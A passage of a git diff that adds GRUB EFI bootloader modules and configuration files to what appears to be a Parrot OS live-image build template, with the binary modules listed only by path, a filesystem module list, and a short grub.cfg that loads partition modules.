b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efi_uga.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efifwsetup.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efifwsetup.mod new file mode 100644 index 00000000..c034c64c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efifwsetup.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efinet.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efinet.mod new file mode 100644 index 00000000..41830d46 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/efinet.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ehci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ehci.mod new file mode 100644 index 00000000..121335a1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ehci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/elf.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/elf.mod new file mode 100644 index 00000000..e899c470 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/elf.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/eval.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/eval.mod new file mode 100644 index 00000000..59c05cf5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/eval.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfat.mod new file mode 100644 index 00000000..7dc06191 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfctest.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfctest.mod new file mode 100644 index 00000000..ff59bd01 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/exfctest.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ext2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ext2.mod new file mode 100644 index 00000000..551529b9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ext2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/extcmd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/extcmd.mod new file mode 100644 index 00000000..0d0cad4c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/extcmd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fat.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fat.mod new file mode 100644 index 00000000..c976e748 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fat.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/file.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/file.mod new file mode 100644 index 00000000..8c94a60c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/file.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fixvideo.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fixvideo.mod new file mode 100644 index 00000000..dbeba025 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fixvideo.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/font.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/font.mod new file mode 100644 index 00000000..307c9880 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/font.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fs.lst b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fs.lst new file mode 100644 index 00000000..a069ccc6 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/fs.lst @@ -0,0 +1,36 @@ +affs +afs +bfs +btrfs +cbfs +cpio +cpio_be +exfat +ext2 +fat +hfs +hfsplus +iso9660 +jfs +minix +minix2 +minix2_be +minix3 +minix3_be +minix_be +newc +nilfs2 +ntfs +odc +procfs +reiserfs +romfs +sfs +squash4 +tar +udf +ufs1 +ufs1_be +ufs2 +xfs +zfs diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_arcfour.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_arcfour.mod new file mode 100644 index 00000000..44f6ca00 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_arcfour.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_blowfish.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_blowfish.mod new file mode 100644 index 00000000..f2ef8200 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_blowfish.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_camellia.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_camellia.mod new file mode 100644 index 00000000..618f52b4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_camellia.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_cast5.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_cast5.mod new file mode 100644 index 00000000..a36adfe8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_cast5.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_crc.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_crc.mod new file mode 100644 index 00000000..97617777 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_crc.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_des.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_des.mod new file mode 100644 index 00000000..36c99d6f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_des.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_dsa.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_dsa.mod new file mode 100644 index 00000000..86e27f26 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_dsa.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_idea.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_idea.mod new file mode 100644 index 00000000..9e344d1d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_idea.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md4.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md4.mod new file mode 100644 index 00000000..ba801adf Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md4.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md5.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md5.mod new file mode 100644 index 00000000..3709dc4f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_md5.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rfc2268.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rfc2268.mod new file mode 100644 index 00000000..98170258 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rfc2268.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rijndael.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rijndael.mod new file mode 100644 index 00000000..b9860114 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rijndael.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rmd160.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rmd160.mod new file mode 100644 index 00000000..bb173da3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rmd160.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rsa.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rsa.mod new file mode 100644 index 00000000..13c700fd Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_rsa.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_seed.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_seed.mod new file mode 100644 index 00000000..176fb942 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_seed.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_serpent.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_serpent.mod new file mode 100644 index 00000000..132d406f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_serpent.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha1.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha1.mod new file mode 100644 index 00000000..f3a72a5f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha1.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha256.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha256.mod new file mode 100644 index 00000000..326b1bb4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha256.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha512.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha512.mod new file mode 100644 index 00000000..aa40e153 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_sha512.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_tiger.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_tiger.mod new file mode 100644 index 00000000..3dacb864 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_tiger.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_twofish.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_twofish.mod new file mode 100644 index 00000000..d15c86f3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_twofish.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_whirlpool.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_whirlpool.mod new file mode 100644 index 00000000..b2bdc095 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gcry_whirlpool.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/geli.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/geli.mod new file mode 100644 index 00000000..6762c88b Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/geli.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gettext.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gettext.mod new file mode 100644 index 00000000..d899660f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gettext.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxmenu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxmenu.mod new file mode 100644 index 00000000..6cc60298 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxmenu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm.mod new file mode 100644 index 00000000..aec4ba4d Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_background.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_background.mod new file mode 100644 index 00000000..e275f7f1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_background.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_menu.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_menu.mod new file mode 100644 index 00000000..621c4358 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gfxterm_menu.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gptsync.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gptsync.mod new file mode 100644 index 00000000..ac2c9dc4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gptsync.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/grub.cfg b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/grub.cfg new file mode 100644 index 00000000..fcf488c1 --- /dev/null +++ b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/grub.cfg @@ -0,0 +1,12 @@ +insmod part_acorn +insmod part_amiga +insmod part_apple +insmod part_bsd +insmod part_dfly +insmod part_dvh +insmod part_gpt +insmod part_msdos +insmod part_plan +insmod part_sun +insmod part_sunpc +source /boot/grub/grub.cfg diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gzio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gzio.mod new file mode 100644 index 00000000..e7337fdb Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/gzio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/halt.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/halt.mod new file mode 100644 index 00000000..916c9ba3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/halt.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hashsum.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hashsum.mod new file mode 100644 index 00000000..28c93489 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hashsum.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hdparm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hdparm.mod new file mode 100644 index 00000000..2d85ba62 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hdparm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/help.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/help.mod new file mode 100644 index 00000000..8885eaca Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/help.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hexdump.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hexdump.mod new file mode 100644 index 00000000..103342c9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hexdump.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfs.mod new file mode 100644 index 00000000..fb1c2f0f Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfsplus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfsplus.mod new file mode 100644 index 00000000..e49db4b7 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfsplus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfspluscomp.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfspluscomp.mod new file mode 100644 index 00000000..ea4ecde1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/hfspluscomp.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/http.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/http.mod new file mode 100644 index 00000000..c2f18a73 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/http.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/iorw.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/iorw.mod new file mode 100644 index 00000000..145b3e73 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/iorw.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jfs.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jfs.mod new file mode 100644 index 00000000..750913b1 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jfs.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jpeg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jpeg.mod new file mode 100644 index 00000000..8f64c413 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/jpeg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keylayouts.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keylayouts.mod new file mode 100644 index 00000000..fb5c5f77 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keylayouts.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keystatus.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keystatus.mod new file mode 100644 index 00000000..c3277df8 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/keystatus.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ldm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ldm.mod new file mode 100644 index 00000000..901dd2c0 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ldm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacy_password_test.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacy_password_test.mod new file mode 100644 index 00000000..eb8ad7a6 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacy_password_test.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacycfg.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacycfg.mod new file mode 100644 index 00000000..f3c895f4 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/legacycfg.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux.mod new file mode 100644 index 00000000..cc5775ee Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux16.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux16.mod new file mode 100644 index 00000000..a6ac73ff Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linux16.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linuxefi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linuxefi.mod new file mode 100644 index 00000000..983f8156 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/linuxefi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadbios.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadbios.mod new file mode 100644 index 00000000..cc8684d3 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadbios.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadenv.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadenv.mod new file mode 100644 index 00000000..58b517a5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loadenv.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loopback.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loopback.mod new file mode 100644 index 00000000..9a815538 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/loopback.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ls.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ls.mod new file mode 100644 index 00000000..cd6c691a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/ls.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsacpi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsacpi.mod new file mode 100644 index 00000000..347d3c78 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsacpi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefi.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefi.mod new file mode 100644 index 00000000..dc753962 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefi.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefimmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefimmap.mod new file mode 100644 index 00000000..52796db5 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefimmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefisystab.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefisystab.mod new file mode 100644 index 00000000..ebe26de2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsefisystab.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsmmap.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsmmap.mod new file mode 100644 index 00000000..4d78f6ed Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lsmmap.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lspci.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lspci.mod new file mode 100644 index 00000000..7c890e61 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lspci.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lssal.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lssal.mod new file mode 100644 index 00000000..3e8e131c Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lssal.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/luks.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/luks.mod new file mode 100644 index 00000000..aa259b84 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/luks.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lvm.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lvm.mod new file mode 100644 index 00000000..509ab11a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lvm.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lzopio.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lzopio.mod new file mode 100644 index 00000000..b8cdb825 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/lzopio.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macbless.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macbless.mod new file mode 100644 index 00000000..08414f5e Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macbless.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macho.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macho.mod new file mode 100644 index 00000000..94360503 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/macho.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09.mod new file mode 100644 index 00000000..ddd837e2 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09_be.mod new file mode 100644 index 00000000..bb178e94 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid09_be.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid1x.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid1x.mod new file mode 100644 index 00000000..d1464eed Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/mdraid1x.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/memrw.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/memrw.mod new file mode 100644 index 00000000..7a1c3c85 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/memrw.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minicmd.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minicmd.mod new file mode 100644 index 00000000..14dc4dd9 Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minicmd.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2.mod new file mode 100644 index 00000000..22a2953a Binary files /dev/null and b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2.mod differ diff --git a/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2_be.mod b/modules/parrot-build/templates/common/includes.binary/boot/grub/x86_64-efi/minix2_be.mod new file mode 100644 index 00000000..d27f9bd0 Binary files /dev/null and 